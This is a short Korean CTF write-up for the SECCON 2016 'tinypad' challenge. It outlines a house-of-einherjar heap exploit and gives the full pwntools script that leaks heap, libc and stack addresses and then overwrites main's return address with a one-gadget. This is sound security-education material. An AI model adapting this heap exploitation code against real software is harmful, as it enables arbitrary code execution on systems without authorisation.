2016-Seccon-tinypad

house of einherjar 문제이다.

[Exploit 방법]

heap 주소와 libc의 주소를 릭

strlen으로 chunk안의 문자의 개수를 판단하고 입력을 함

heap에 쓰레기 값을 다른 heap의 사이즈 앞까지 넣음(poison-null-byte)

house of einherjar을 사용

prev_size(할당된 힙의 주소-0x10-할당할 위치)로 변경 그리고 prev_inuse를 0으로 만듬

tinypad주소에 할당

environ 주소로 stack leak

main의 ret부분을 구해서 oneshot을 넣음

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
from pwn import *
 
def add(size,content):
        sla('>>>','a')
        sla('>>>',str(size))
        sla('>>>',content)
 
def delete(idx):
        sla('>>>','d')
        sla('>>>',str(idx))
 
def edit(idx,content):
        sla('>>>','e')
        sla('>>>',str(idx))
        sla('>>>',content)
        sla('>>>','Y')
 
r=process('./tinypad')
e=ELF('./tinypad')
libc=e.libc
 
sla = lambda x,y : r.sendlineafter(x,y)
ru = lambda x : r.recvuntil(x)
sa = lambda x,y : r.sendafter(x,y)
 
 
add(0x70,'A'*8)#1
add(0x70,'B'*8)#2
add(0x100,'B'*8)#3
 
delete(2)
delete(1)
 
ru('CONTENT: ')
heap_leak=u64(ru('\n').replace('\n','').ljust(8,'\x00'))-0x80
log.info('Heap : '+hex(heap_leak))
 
delete(3)
 
ru('#   INDEX: 1')
ru('CONTENT: ')
main_arena=u64(ru('\x7f').ljust(8,'\x00'))
log.info('Main_arena : '+hex(main_arena))
libc_leak=main_arena-0x3c4b78
log.info('Libc : '+hex(libc_leak))
environ=libc_leak+libc.symbols['environ']
log.info('Environ : '+hex(environ))
oneshot=libc_leak+0xf1147
log.info('Oneshot : '+hex(oneshot))
 
add(0x18,'A'*0x18)#1
add(0x100,'B'*0xf8+'\x11')#2
add(0x100,'C'*0xf8)#3
add(0x100,'D'*0xf8)#4
 
 
'''
heap+0x10:      0x41414141      0x41414141      0x41414141      0x41414141
heap+0x20:      0x41414141      0x41414141      0x00000111      0x00000000
'''
 
tinypad=0x602040
fake_prev_size=heap_leak+0x30-0x10-(tinypad+0x20)
log.info('Fake_prev_size : '+hex(fake_prev_size))
 
fake_chunk='D'*0x20+p64(0)+p64(0x101)+p64(tinypad+0x20)*2
 
edit(1,'A'*0x18+'f\x01')
edit(1,'A'*0x18)
 
for i in range(3,-1,-1):
        edit(1,'A'*0x14+'f'*i)
 
edit(1,'A'*0x10+p64(fake_prev_size))
edit(3,fake_chunk)
 
delete(2)
 
'''
size_error
0x602060 <tinypad+32>:  0x00000000      0x00000000      0x0072d0c1      0x00000000
0x602070 <tinypad+48>:  0x4f540b78      0x00007f24      0x4f540b78      0x00007f24
'''
 
change_size='A'*0x20+p64(0)+p64(0x101)+p64(main_arena)*2
edit(4,change_size)
 
 
add(0xf8,'A'*0xd8+p64(0x602150)+'A'*8+p64(environ))
ru('#   INDEX: 2')
ru('CONTENT: ')
stack=u64(ru('\x7f').ljust(8,'\x00'))
ret=stack-240
 
log.info('Stack : '+hex(stack))
log.info('Ret : '+hex(ret))
 
edit(1,'A'*8+p64(ret))
edit(2,p64(oneshot))
 
sla('>>>','q')
 
r.interactive()
cs